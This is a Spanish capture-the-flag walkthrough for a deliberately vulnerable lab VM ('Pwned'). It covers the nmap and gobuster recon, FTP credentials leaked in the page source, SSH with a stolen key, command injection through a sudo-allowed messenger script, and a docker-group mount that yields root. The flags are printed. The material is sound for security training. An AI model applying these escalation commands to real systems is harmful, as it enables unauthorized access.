Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 03:21 EDT
Nmap scan report for 192.168.5.38
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe💿90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
MAC Address: 08:00:27:51:18:90 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds
Veremos que encontramos un puerto 80 y un FTP, en el 80 veremos que aloja una pagina wbe, en la que si entramos no veremos nada interesante, por lo que vamos a probar a conectarnos de forma anonima al FTP a ver si nos deja.
Pero veremos que no nos deja, por lo que vamos a realizar un poco de fuzzing a ver que nos encontramos.
Gobuster
Info:
Veremos que hay un directorio bastante interesante llamado /hidden_text por lo que vamos a investigarlo, si entramos dentro de el veremos un archivo llamado secret.dic.
Por lo que podemos deducir que puede ser para utilizarlo con gobuster de nuevo, pero con ese diccionario de palabras.
Info:
Veremos que nos descubre un sitio web llamado pwned.vuln vamos a ver que contiene, entrando dentro veremos como una especie de login, si probamos credenciales por defecto no nos dejara, pero si inspeccionamos el codigo veremos lo siguiente:
Vemos unas credenciales las cuales parecen ser que son para el FTP vamos a probarlas de la siguiente forma.
Escalate user ariana
FTP
Metemos como contraseña B0ss_B!TcH y veremos que estamos dentro, si listamos veremos un directorio llamado share si entramos dentro veremos lo siguiente:
Veremos una clave PEM y una nota, vamos a descargarnos las dos cosas con get.
Ahora si nos salimos y leemos la nota veremos lo siguiente:
Vemos un posible usuario para la id_rsa llamado ariana por lo que vamos a probar con dicho usuario.
SSH
Info:
Con esto veremos que estaremos dentro, por lo que leeremos la primera flag de este usuario.
user1.txt
Escalate user selena
Si hacemos sudo -l veremos lo siguiente:
Vemos que podemos ejecutar el script como el usuario selena, vamos a ver que realizar dicho script.
Si leemos el script, veremos lo siguiente:
Vemos que esta utilizando echo para simular una especie de chat, vamos a ejecutarlo a ver que pasa.
Info:
Vemos que se esta ejecutando los comandos que meto, en este caso id que por cierto estamos viendo que pertenece al grupo docker, vamos a poner directamente bash para obtener una shell como dicho usuario.
Info:
Ahora vamos a sanitizarlo un poco.
Ahora leeremos la segunda flag del usuario.
user2.txt
Escalate Privileges
Si hacemos id veremos lo siguiente bastante interesante:
Info:
Vemos que pertenece al grupo docker por lo que podremos realizar lo siguiente para ser root.
Info:
Con esto veremos que ya seremos root, por lo que leeremos la flag de root.
Wow you are here
ariana won't happy about this note
sorry ariana :(
chmod 600 id_rsa
ssh -i id_rsa ariana@<IP>
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ whoami
ariana
congratulations you Pwned ariana
Here is your user flag ↓↓↓↓↓↓↓
fb8d98be1265dd88bac522e1b2182140
Try harder.need become root
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
sudo -u selena /home/messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : selena
Enter message for selena :id
Sending message to selena
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
Message sent to selena :)
sudo -u selena /home/messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : selena
Enter message for selena :bash
Sending message to selena
whoami
selena
script /dev/null -c bash
711fdfc6caad532815a440f7f295c176
You are near to me. you found selena too.
Try harder to catch me
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
root@b5197dec18e9:/# whoami
root
4d4098d64e163d2726959455d046fd7c
You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)
You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation
Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm ajs_walker
Twitter Ajs_walker
